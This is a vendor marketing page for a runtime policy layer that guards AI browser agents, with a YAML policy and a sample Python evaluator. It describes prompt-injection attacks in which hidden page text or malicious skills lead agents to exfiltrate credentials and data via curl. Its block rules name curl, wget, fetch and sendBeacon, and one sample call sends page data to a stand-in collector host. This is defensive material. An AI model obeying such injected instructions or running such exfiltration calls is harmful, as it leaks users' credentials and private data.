Use Cases/Browser Agents

A malicious skill ran curl and exfiltrated your data. The agent never asked.

Browser agents navigate pages, fill forms, extract data, and execute scripts with your authenticated sessions. Veto intercepts every action before execution, enforcing URL allowlists, form field protection, and credential access controls that the agent cannot bypass.

URL allowlisting · Data exfiltration prevention · Credential protection

Cisco proved this attack works

In late 2025, Cisco's AI Defense team tested OpenClaw, a viral AI agent framework with 60,000 GitHub stars. A malicious third-party skill executed curl commands that sent user data to an external server, then erased the logs. The skill achieved this through prompt injection that bypassed the agent's safety guidelines. Cisco surfaced nine vulnerabilities — two critical, five high severity. OpenAI's CISO later acknowledged that prompt injection in browser agents "is unlikely to ever be fully solved."

Why browser agents are the highest-risk surface

Browser agents have direct access to your authenticated sessions, can see everything on screen, and can interact with any website you can. Researchers have demonstrated that hidden instructions on a web page can command an AI browser to extract a user's email, retrieve a one-time password from Gmail, and post credentials to an attacker's server — all without traditional malicious code. In February 2025, Johann Rehberger demonstrated Zero-Interaction Exfiltration: hidden instructions on a GitHub page commanded an AI to leak private data without any user input. CVE-2025-47241 in a widely-used browser automation library affected over 1,500 AI projects by allowing attackers to bypass security whitelists.

Credential theft

Agents read password fields, access session cookies, and extract API keys. Malicious skills silently exfiltrate credentials via curl and erase logs.

Data exfiltration

Agents scrape dashboards, customer records, and internal tools. Prompt injection on any visited page can trigger silent data transfer to attacker-controlled servers.

Unauthorized actions

Agents submit forms without approval — making purchases, sending emails, or modifying critical settings. Hidden page instructions can trigger these actions.

Screenshot exposure

Agents capture screenshots of sensitive screens, exposing PII, financial data, or confidential business information to unauthorized parties.

URL allowlisting and blocklisting policies

Define exactly where your browser agent can navigate. Allowlist approved business tools, block sensitive domains, and require human approval for unknown sites. Unlike prompt-based restrictions, these policies are enforced at runtime and cannot be overridden by injection.

veto/policies/browser.yaml
policies:
  # Allow navigation to approved business tools only
  - name: "Allow business tools"
    match:
      tool: "navigate"
      arguments:
        url: '^https://(crm|docs|slack)\.company\.com/.*$'
    action: allow

  # Block data exfiltration vectors
  - name: "Block outbound data transfer"
    match:
      tool: "execute_script"
      arguments:
        code: '(curl|wget|fetch|XMLHttpRequest|navigator\.sendBeacon).*'
    action: deny
    response:
      error: "Outbound data transfer is not permitted"

  # Block financial and email sites
  - name: "Block sensitive domains"
    match:
      tool: "navigate"
      arguments:
        url: '^https?://(bank|paypal|gmail|outlook)\..*'
    action: deny
    response:
      error: "Navigation to sensitive domains is blocked"

  # Protect password and payment fields
  - name: "Block sensitive field interaction"
    match:
      tool: "fill_form"
      arguments:
        field_type: "(password|credit-card|ssn)"
    action: deny
    response:
      error: "Interaction with sensitive form fields is blocked"

  # Require approval for form submissions
  - name: "Approve destructive form submissions"
    match:
      tool: "submit_form"
      arguments:
        action_url: ".*(payment|checkout|delete|settings).*"
    action: require_approval
    approval:
      timeout_minutes: 15
      channels: [slack]

  # Default: require approval for unknown domains
  - name: "Approve unknown navigation"
    match:
      tool: "navigate"
    action: require_approval
    approval:
      timeout_minutes: 10
      reason: "Navigation to unrecognized domain"
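To show how the rules above are applied at the tool-call level, here is an added example evaluator (not Veto's own code): it transcribes the same six rules, assumes first-match ordering, regex search semantics on each argument and default-deny for calls no rule matches, and runs a few constructed tool calls through them.

```python
import re


def rule(name, action, tool, **argument_patterns):
    """Build one policy entry in the shape of the YAML above."""
    return {"name": name, "action": action,
            "match": {"tool": tool, "arguments": argument_patterns}}


# The six rules from veto/policies/browser.yaml, in the same order.
POLICIES = [
    rule("Allow business tools", "allow", "navigate",
         url=r"^https://(crm|docs|slack)\.company\.com/.*$"),
    rule("Block outbound data transfer", "deny", "execute_script",
         code=r"(curl|wget|fetch|XMLHttpRequest|navigator\.sendBeacon).*"),
    rule("Block sensitive domains", "deny", "navigate",
         url=r"^https?://(bank|paypal|gmail|outlook)\..*"),
    rule("Block sensitive field interaction", "deny", "fill_form",
         field_type=r"(password|credit-card|ssn)"),
    rule("Approve destructive form submissions", "require_approval", "submit_form",
         action_url=r".*(payment|checkout|delete|settings).*"),
    rule("Approve unknown navigation", "require_approval", "navigate"),
]


def matches(policy, tool, args):
    """A rule matches when the tool name is equal and every argument regex is found
    (assumption: search semantics, so the author's ^...$ anchors decide strictness)."""
    m = policy["match"]
    if m["tool"] != tool:
        return False
    return all(isinstance(args.get(k), str) and re.search(pat, args[k])
               for k, pat in m["arguments"].items())


def evaluate(tool, args, policies=POLICIES):
    """Return (action, rule_name). Assumptions: first matching rule wins and a
    call no rule matches is denied (default-deny)."""
    for p in policies:
        if matches(p, tool, args):
            return p["action"], p["name"]
    return "deny", "default-deny"


# Constructed tool calls an injected page might cause an agent to attempt.
SAMPLE_CALLS = [
    ("navigate", {"url": "https://crm.company.com/leads/42"}),
    ("navigate", {"url": "https://crm.company.com.evil.example/"}),  # look-alike host
    ("navigate", {"url": "https://paypal.com/login"}),
    ("execute_script", {"code": "const t = document.title; fetch('https://collector.example/?d=' + t)"}),
    ("fill_form", {"field_type": "password", "value": "hunter2"}),
    ("submit_form", {"action_url": "https://crm.company.com/checkout"}),
]

if __name__ == "__main__":
    for tool, args in SAMPLE_CALLS:
        print(tool, "->", *evaluate(tool, args))
```

Because the script rule's regex is unanchored, search semantics let it catch a fetch call anywhere in the script; under match-at-start semantics it would only fire when the script begins with one of those tokens.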

How Veto stops prompt injection attacks

Prompt injection is the fundamental vulnerability of browser agents. Attackers embed instructions in web page content that the agent processes as commands. Veto operates outside the agent's context window, so injected instructions cannot modify or bypass policies.

Domain-level enforcement

Even if a prompt injection convinces the agent to navigate to a malicious site, Veto blocks the navigation at the tool-call level. The agent receives a policy denial, not a prompt instruction. It cannot reason its way around it.

Script execution control

Block curl, wget, fetch, and WebSocket connections to unknown endpoints. Even if the agent is tricked into executing an exfiltration script, Veto intercepts the tool call and denies it before execution.

Form field protection

Prevent agents from reading or writing to password, credit card, and SSN fields regardless of what instructions appear in the page content. Require approval for form submissions to payment or deletion endpoints.

Credential isolation

Block access to stored credentials, session tokens, and browser cookies. Agents operate with the minimum session access needed. All credential-related attempts are logged for audit.

Common browser agent policies

Domain allowlisting

Default-deny navigation. Only explicitly approved domains are accessible. Unknown domains require human approval before the agent can proceed.

Sensitive path blocking

Block admin panels, settings pages, and deletion endpoints even on allowlisted domains. Granular path-level control per domain.

Form submission approval

Require human approval for any form that creates, modifies, or deletes data. Allow read-only form interactions without approval.

Screenshot redaction

Block screenshots on PII-containing pages. Auto-redact credit card numbers, emails, and account data from captured images.

Credential access logging

Log and alert on any attempt to access password fields, session cookies, or credential manager data. Block extraction entirely.

Script execution control

Block eval, prevent WebSocket connections to unknown endpoints, and deny all outbound data transfer commands (curl, fetch, sendBeacon).

Frequently asked questions

How does Veto prevent data exfiltration from browser agents?

Veto intercepts every tool call before execution, including script execution, network requests, and navigation. Outbound data transfer commands like curl, fetch, and sendBeacon are blocked at the policy level. Even if a prompt injection convinces the agent to exfiltrate data, the tool call is denied before it runs. This is the same attack vector Cisco demonstrated against OpenClaw.

Can prompt injection bypass Veto's browser agent guardrails?

No. Veto operates outside the agent's context window. Policies are evaluated at the tool-call level, not the prompt level. A prompt injection can change what the agent wants to do, but it cannot change what Veto allows the agent to do. This is the fundamental difference between prompt-based guardrails and runtime authorization.

Can I allow browser agents to access only specific pages on a domain?

Yes. Veto policies support regex URL matching. You can allowlist specific paths (e.g., crm.company.com/leads/*) while blocking others (e.g., crm.company.com/admin/*) on the same domain. This provides page-level access control within a single domain.

How do approval workflows work for browser agent actions?

When a browser agent attempts an action requiring approval, Veto pauses execution and sends a notification via Slack, email, or your preferred channel. Reviewers approve or deny from their dashboard. Approved actions resume automatically. Denied actions return an error to the agent.

Do browser agent guardrails affect performance?

Policy evaluation happens locally in under 10ms. Network latency only applies to approval workflows and cloud-based audit logging. The agent operates normally while guardrails evaluate each action in real time.

Your browser agent has your session cookies.

Make sure it only does what you authorized.